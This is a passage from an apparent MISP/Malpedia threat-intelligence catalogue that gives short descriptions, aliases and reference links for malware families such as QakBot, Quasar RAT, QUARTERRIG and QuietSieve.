https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.ic3.gov/Media/News/2021/211101.pdf

Qaccel

The tag is: misp-galaxy:malpedia="Qaccel"

Qaccel is also known as:

Table 4352. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel

QakBot

QBot, also known as Qakbot or Pinkslipbot, is a modular information stealer that has been active since 2007. It has historically been classified as a banking trojan, meaning that it steals financial data from infected systems, and it also acts as a loader, using its C2 servers to select and download follow-on payloads.

The tag is: misp-galaxy:malpedia="QakBot"

QakBot is also known as:

  • Oakboat

  • Pinkslipbot

  • Qbot

  • Quakbot

Table 4354. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html

https://isc.sans.edu/diary/rss/28728

https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/

https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan

https://embee-research.ghost.io/advanced-threat-intel-queries-catching-83-qakbot-servers-with-regex-censys-and-tls-certificates/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction

https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic

https://twitter.com/embee_research/status/1592067841154756610?s=20

https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view

https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/

https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html

https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/

https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://www.elastic.co/de/security-labs/qbot-malware-analysis

https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ

https://twitter.com/Unit42_Intel/status/1461004489234829320

https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware

https://isc.sans.edu/diary/rss/28568

https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf

https://www.group-ib.com/blog/prolock_evolution

https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://www.elastic.co/security-labs/qbot-malware-analysis

https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html

https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf

https://www.reliaquest.com/blog/qbot-black-basta-ransomware/

https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf

https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta

https://blog.lumen.com/qakbot-retool-reinfect-recycle/

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://blog.group-ib.com/prometheus-tds

https://experience.mandiant.com/trending-evil-2/p/1

https://blog.quosec.net/posts/grap_qakbot_strings/

https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a

https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/

https://sansorg.egnyte.com/dl/ALlvwK6fp0

https://quosecgmbh.github.io/blog/grap_qakbot_strings.html

https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike

https://www.intrinsec.com/egregor-prolock/

https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/

https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/

https://www.um.edu.mt/library/oar/handle/123456789/76802

https://www.youtube.com/watch?v=iB1psRMtlqg

https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/

https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/

https://github.com/0xThiebaut/PCAPeek/

https://web.archive.org/web/20151026140427/https://www.symantec.com/security_response/writeup.jsp?docid=2009-050707-0639-99

https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/

https://web.archive.org/web/20110406012907/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-ii

https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html

https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/

https://www.youtube.com/watch?v=gk7fCC5RiAQ

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf

https://asec.ahnlab.com/en/44662/

http://www.secureworks.com/research/threat-profiles/gold-lagoon

https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html

https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://embee-research.ghost.io/shodan-censys-queries/

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf

https://www.justice.gov/d9/2023-08/23mj4251_application_redacted.pdf

https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html

https://www.group-ib.com/blog/egregor

https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/

https://syrion.me/malware/qakbot-bb-extractor/

https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf

https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/

https://twitter.com/ChouchWard/status/1405168040254316547

https://www.malwarology.com/posts/3-qakbot-process-injection/

https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/

https://twitter.com/kienbigmummy/status/1460537501676802051

https://www.team-cymru.com/post/visualizing-qakbot-infrastructure

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/

https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/

https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/

https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://www.spamhaus.org/news/article/819/qakbot-the-takedown-and-the-remediation

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot

https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html

https://www.youtube.com/watch?v=OCRyEUhiEyw

https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga

http://contagiodump.blogspot.com/2010/11/template.html

https://securelist.com/qakbot-technical-analysis/103931/

https://twitter.com/tylabs/status/1462195377277476871

https://web.archive.org/web/20120206174705/http://blogs.rsa.com/rsafarl/businesses-beware-qakbot-spreads-like-a-worm-stings-like-a-trojan/

https://www.malwarology.com/2022/04/qakbot-series-process-injection/

https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html

https://www.circl.lu/pub/tr-64/

https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/

https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks

https://blog.quosec.net/posts/grap_qakbot_navigation/

https://malwareandstuff.com/upnp-messing-up-security-since-years/

https://krebsonsecurity.com/2023/08/u-s-hacks-qakbot-quietly-removes-botnet-infections/

https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/

https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://twitter.com/TheDFIRReport/status/1361331598344478727

https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html

https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://web.archive.org/web/20130530033754/http://www.symantec.com/connect/blogs/qakbot-steals-2gb-confidential-data-week

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails

https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros

https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/

https://hatching.io/blog/reversing-qakbot

https://redcanary.com/blog/intelligence-insights-december-2021

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://blog.talosintelligence.com/following-the-lnk-metadata-trail

https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841

https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf

https://labs.k7computing.com/index.php/qakbot-returns/

https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/

https://web.archive.org/web/20110909041410/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-i

https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf

https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf

https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques

https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs

https://www.silentpush.com/blog/malicious-infrastructure-as-a-service

https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques

https://www.youtube.com/watch?v=4I0LF8Vm7SI

https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://www.atomicmatryoshka.com/post/malware-headliners-qakbot

https://www.malwarology.com/2022/04/qakbot-series-api-hashing/

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken—​the-resurgence-of-the-emotet-botnet-malw.html

http://blog.opensecurityresearch.com/2011/12/intro-to-reversing-w32pinkslipbot.html

https://www.justice.gov/d9/2023-08/23mj4244_application_redacted.pdf

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/

https://www.youtube.com/watch?v=M22c1JgpG-U

https://www.justice.gov/usao-cdca/pr/qakbot-malware-disrupted-international-cyber-takedown

https://www.malwarology.com/posts/2-qakbot-conf-extraction/

https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/

https://bin.re/blog/the-dga-of-qakbot/

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/

https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/

https://d01a.github.io/pikabot/

https://redcanary.com/blog/intelligence-insights-november-2021/

https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

https://twitter.com/elisalem9/status/1381859965875462144

https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature

https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/

https://www.shadowserver.org/news/qakbot-botnet-disruption/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html

https://www.elastic.co/security-labs/qbot-configuration-extractor

https://experience.mandiant.com/trending-evil/p/1

https://isc.sans.edu/diary/rss/28448

https://twitter.com/redcanary/status/1334224861628039169

https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html

https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/

https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7

https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/

https://www.secureworks.com/blog/law-enforcement-takes-down-qakbot

https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/

https://twitter.com/alex_il/status/1384094623270727685

https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/

https://twitter.com/Corvid_Cyber/status/1455844008081641472

https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html

https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.secureworks.com/research/threat-profiles/gold-lagoon

https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown

https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html

https://isc.sans.edu/diary/rss/26862

https://www.malwarology.com/posts/4-qakbot-api-hashing/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html

https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps

QHost

The tag is: misp-galaxy:malpedia="QHost"

QHost is also known as:

  • Tolouge

Table 4355. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost

QUARTERRIG

A stager used by APT29 to download and run CobaltStrike. Here, MUSKYBEAT refers to the in-memory dropper component, while STATICNOISE is the final payload / downloader.

The tag is: misp-galaxy:malpedia="QUARTERRIG"

QUARTERRIG is also known as:

  • MUSKYBEAT

  • STATICNOISE

Table 4358. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf

https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77

Quasar RAT

Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.

The tag is: misp-galaxy:malpedia="Quasar RAT"

Quasar RAT is also known as:

  • CinaRAT

  • QuasarRAT

  • Yggdrasil

Table 4359. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

https://blog.malwarelab.pl/posts/venom/

https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://blog.minerva-labs.com/trapping-quasar-rat

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf

https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ

https://embee-research.ghost.io/hunting-quasar-rat-shodan

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://blog.ensilo.com/uncovering-new-activity-by-apt10

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html

http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://twitter.com/struppigel/status/1130455143504318466

https://embee-research.ghost.io/shodan-censys-queries/

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://blog.morphisec.com/syk-crypter-discord

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?

https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques

https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html

https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/

https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://asec.ahnlab.com/en/31089/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848

https://securelist.com/apt-trends-report-q1-2021/101967/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat

https://blog.reversinglabs.com/blog/rats-in-the-library

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://www.antiy.cn/research/notice&report/research_report/20201228.html

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://twitter.com/malwrhunterteam/status/789153556255342596

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/

https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/

https://www.youtube.com/watch?v=yimh33nSOt8

https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html

https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf

https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/

https://intel471.com/blog/privateloader-malware

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

QUICKMUTE

QuickMute is malware developed in C/C++. Functionally, it provides download, RC4 decryption, and in-memory launch of a payload (it expects a PE file exporting the function "HttpsVictimMain"). For communication with its management server, several protocols are supported, in particular TCP, UDP, HTTP and HTTPS.

The tag is: misp-galaxy:malpedia="QUICKMUTE"

QUICKMUTE is also known as:

Table 4361. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute

https://cert.gov.ua/article/375404

QuietSieve

According to Microsoft, this is a heavily obfuscated .NET malware, primarily geared towards the exfiltration of data from the compromised host. But it can also receive and execute a remote payload from the operator.

The tag is: misp-galaxy:malpedia="QuietSieve"

QuietSieve is also known as:

Table 4363. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.quietsieve

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

QuiteRAT

QuiteRAT is a simple remote access trojan written with the help of Qt libraries.

